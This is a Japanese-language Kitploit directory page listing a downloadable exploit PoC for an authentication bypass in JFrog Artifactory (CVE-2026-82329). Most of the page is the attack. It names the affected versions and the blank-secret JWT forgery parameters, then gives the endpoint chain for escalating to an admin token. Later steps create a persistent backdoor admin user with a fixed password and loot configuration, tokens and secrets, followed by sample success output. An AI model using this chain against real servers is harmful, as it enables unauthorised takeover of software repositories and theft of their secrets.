Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-82329-JFrog-Artifactory- — CVE-2026-82329のエクスプロイトPoC。JFrog Artifactoryにおける認証バイパスです。JWTトークンを偽造して管理者アクセスを取得し、永続的なバックドアユーザーを作成することを実証します。 | Kitploit
ツール/GitHubGitHub/0xterror/cve-2026-82329-jfrog-artifactory-
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHub0xterror/cve-2026-82329-jfrog-artifactory-

CVE-2026-82329-JFrog-Artifactory-

CVE-2026-82329のエクスプロイトPoC。JFrog Artifactoryにおける認証バイパスです。JWTトークンを偽造して管理者アクセスを取得し、永続的なバックドアユーザーを作成することを実証します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
15時間41分前未レビュー

CVE-2026-82329-JFrog-Artifactory-

CVE-2026-82329 — JFrog Artifactory 認証バイパス

脆弱性の概要

JFrog Artifactory(バージョン 7.111.20、7.117.27、7.125.19、7.133.28、7.146.37、7.161.19)における重大な認証バイパス。この欠陥により、認証されていない攻撃者が空白のHMACシークレット(0x20の32バイト)を使用してJWTを偽造し、管理者トークンを発行して、バックドアユーザーを作成することが可能になります。

エクスプロイトチェーン

ステップ アクション 1 alg=HS256、kid=SHA256("")、skip_node_registration=true でJWTを偽造 2 JWTを /access/api/v1/registry/join に送信 → SERVICEトークンを取得 3 /access/api/v1/tokens 経由でSERVICEトークンをADMINトークンと交換 4 /artifactory/api/system/configuration、/access/api/v1/tokens、/artifactory/api/system/version で管理者アクセスを検証 5 /artifactory/api/security/users/{user} 経由で永続的な管理者ユーザーを作成 6 設定、トークン、ユーザー、リポジトリ、シークレットを収奪 7 高価値サブジェクト用のトークンを偽造

攻撃フロー

root@kitploit:~
BLANK_SECRET = b"\x20" * 32
    ↓
JWTを偽造 (HS256, kid=hashlib.sha256(""))
    ↓
POST /access/api/v1/registry/join
    ↓
SERVICEトークン (scp=admin)
    ↓
POST /access/api/v1/tokens
    ↓
ADMINトークン (scp=applied-permissions/admin, aud=*)
    ↓
管理者権限を証明 (GET /artifactory/api/system/configuration → 200)
    ↓
PUT /artifactory/api/security/users/0xTerror
    ↓
永続的な管理者ユーザー: 0xTerror:Terrorp0c!7777
    ↓
収奪: 設定、トークン、ユーザー、リポジトリ、シークレット
    ↓
横展開チェック: Xray、Mission Control、Distribution など
    ↓
高価値サブジェクト用のトークンを偽造

PoC出力例

root@kitploit:~
[+] Step 1  /registry/join -> HTTP 201 SERVICEトークン (scp=admin)
[+] Step 2  /access/api/v1/tokens -> HTTP 200 ADMINトークン (scp=applied-permissions/admin)
[+] Step 3  管理者権限の証明: config=200, tokens=200, version=200
[+] Step 4  管理者ユーザー '0xTerror' を作成 -> HTTP 201
[=] 脆弱性あり — 認証されていない攻撃者がADMINを取得
      管理者ユーザー: 0xTerror:Terrorp0c!7777
ツールをダウンロード